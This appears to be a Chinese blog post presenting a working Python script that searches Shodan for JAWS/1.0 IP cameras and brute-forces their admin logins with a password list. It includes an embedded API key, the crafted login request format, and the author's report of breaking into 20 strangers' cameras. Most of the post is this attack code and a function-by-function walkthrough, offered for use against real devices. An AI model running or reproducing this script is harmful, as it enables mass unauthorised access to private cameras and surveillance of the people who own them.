Python脚本自动化破解大白鲨摄像头(Shodan)

关于本文的技术知识点,Shodan模块的用法,传送门——>  Python中shadon模块的使用    Shodan的使用

今天我们要利用python进行自动化破解的摄像头叫大白鲨摄像头,他的Banner信息头有一个很明显的特征就是 JAWS/1.0 。

我们先利用 Shodan搜索一下 JAWS/1.0,就可以看到出来了很多摄像头

大白鲨这种摄像头有一个特点就是他的 admin 账户的密码默认是空。而很多人买了摄像头之后装上就草草了事了,也不会去修改密码。所以我们是利用很多用户的摄像头空密码的漏洞,去暴力测试。

具体代码如下:环境  python 2.7.5

# -*- coding: utf-8 -*-
"""
Created on Fri Nov 16 21:56:15 2018
@author: 小谢
"""
import urllib
import urllib2
import time
import shodan
i=0
api=shodan.Shodan("cB9sXwb7l95ZhSJaNgcaO7NQpkzfhQVM") 
def FindTarget():
    try:
        f=open("target.txt","w")
        results=api.search('JAWS/1.0') 
        print("Results found:%s"%results['total'])
        for result in results['matches']:
            url=result['ip_str']+":"+str(result['port'])
            f.write(url+"\n")
        f.close()
    except shodan.APIError,e:
        print("Error:%s"%e)
def Login(host,port):
    global i
    try:
        with open("passwd.txt","r") as f:
            for line in f.readlines():
                passwd=line.strip("\n").strip("\r")
                headers={
                         'Host':host,
                         'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
                         'Referer':"http://"+host+"/",
                         'Accept':"*/*",
                         'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
                         'X-Requested-With':'XMLHttpRequest',
                         'Cookie':'lxc_save=admin%2c'+passwd+";dvr_camcnt=16;dvr_clientport="+port+";dvr_sensorcnt=4; dvr_usr=admin; dvr_pwd="+passwd+"; iSetAble=1; iPlayBack=1",
                         'Connection':'close'
                         }
                a='<juan ver=\"\" squ=\"\" dir=\"0\"><rpermission usr=\"admin\" pwd=\"'+passwd+'\"><config base=\"\"/><playback base=\"\"/></rpermission></juan>'
                b=urllib.quote(a)  #对a进行URL编码
                ti=int(time.time())    #获取当前距离元点的时间,整数
                data="xml="+b+"&_="+str(ti)
                url="http://"+host+"/cgi-bin/gw.cgi?"+data   #提交的url
                req=urllib2.Request(url=url,headers=headers) #得到一个urblib2.Request对象
                try:
                    response=urllib2.urlopen(req,timeout=5)
                    length=response.headers['Content-Length']
                    if length==str("175"):
                        i=i+1
                        if passwd=="":
                            print(host+"是空密码")
                            files=open("ip.txt","a")
			    data=host+passwd
                            files.write(data)
                            files.write("\n")
                            files.close()
                            break
                        else:
                            print(host+"--"+passwd+"--")
                            break
                except urllib2.URLError,e:
                    print("该网站"+host+"对输入密码错误三次进行了锁定!")
                    break
    except Exception , e:
        print("请求超时!")
def exploit():
    try:
        with open("target.txt") as f:
            for line in f.readlines():
                host=line.strip("\n").strip("\r")
                port=host.split(":")[1].strip("\r")
                Login(host,port)
    except Exception ,e:
        print("出现异常:%s",e)
    finally:
        print("共破解"+str(i)+"个摄像头")
def main():
    FindTarget()
    exploit()
if __name__=="__main__":
    start=time.time()
    main()
    end=time.time()
    print("共花费了%s的时间"%(end-start))

脚本运行截图

可以看到,最后一共破解了20个摄像头,用了375秒的时间。

随便登录一个

因为我们Shodan的没有付费,所以只能搜索到前100个摄像头,所以我们是从前100个摄像头里面破解了20个摄像头。

具体函数模块讲解:

FindTarget() 函数用于查找在线的 大白鲨摄像头,并且写入 target.txt  文件中

def FindTarget():
    try:
        f=open("target.txt","w")
        results=api.search('JAWS/1.0')     #搜索大白鲨摄像头
        print("Results found:%s"%results['total'])
        for result in results['matches']:
            url=result['ip_str']+":"+str(result['port'])  #摄像头的ip和端口
            f.write(url+"\n")    
        f.close()
    except shodan.APIError,e:
        print("Error:%s"%e)

Login() 用于尝试登录每个 ip 地址,用户名为 admin 密码为我们 passwd.txt文件中的密码字典。这就需要我们模拟登录时候包的结构了。我们先尝试浏览器登录,然后设置代理查看数据包的结构。然后我们再利用python模拟数据包发送,进行自动化测试。

将回包长度为 175的地址写入ip.txt文件中。回包长度为175说明登录成功,其他长度都是登录失败!

def Login(host,port):
    global i
    try:
        with open("passwd.txt","r") as f:
            for line in f.readlines():
                passwd=line.strip("\n").strip("\r")
                headers={
                         'Host':host,
                         'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
                         'Referer':"http://"+host+"/",
                         'Accept':"*/*",
                         'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
                         'X-Requested-With':'XMLHttpRequest',
                         'Cookie':'lxc_save=admin%2c'+passwd+";dvr_camcnt=16;dvr_clientport="+port+";dvr_sensorcnt=4; dvr_usr=admin; dvr_pwd="+passwd+"; iSetAble=1; iPlayBack=1",
                         'Connection':'close'
                         }
                a='<juan ver=\"\" squ=\"\" dir=\"0\"><rpermission usr=\"admin\" pwd=\"'+passwd+'\"><config base=\"\"/><playback base=\"\"/></rpermission></juan>'
                b=urllib.quote(a)
                ti=int(time.time())    #获取当前距离元点的时间,整数
                data="xml="+b+"&_="+str(ti)
                url="http://"+host+"/cgi-bin/gw.cgi?"+data   #提交的url
                req=urllib2.Request(url=url,headers=headers)
                try:
                    response=urllib2.urlopen(req,timeout=5)  #设置超时
                    length=response.headers['Content-Length']
                    if length==str("175"):
                        i=i+1
                        if passwd=="":
                            print(host+"是空密码")
                            files=open("ip.txt","a")
			    data=host+passwd
                            files.write(data)
                            files.write("\n")
                            files.close()
                            break
                        else:
                            print(host+"--"+passwd+"--")
                            break
                except urllib2.URLError,e:
                    print("该网站"+host+"对输入密码错误三次进行了锁定!")
                    break
    except Exception , e:
        print("请求超时!")

exploit()函数就是读取 target.txt 文件中的地址,然后将其一个一个破解

def exploit():
    try:
        with open("target.txt") as f:
            for line in f.readlines():
                host=line.strip("\n").strip("\r")
                port=host.split(":")[1].strip("\r")
                Login(host,port)
    except Exception ,e:
        print("出现异常:%s",e)
    finally:
        print("共破解"+str(i)+"个摄像头")

 

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 19.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值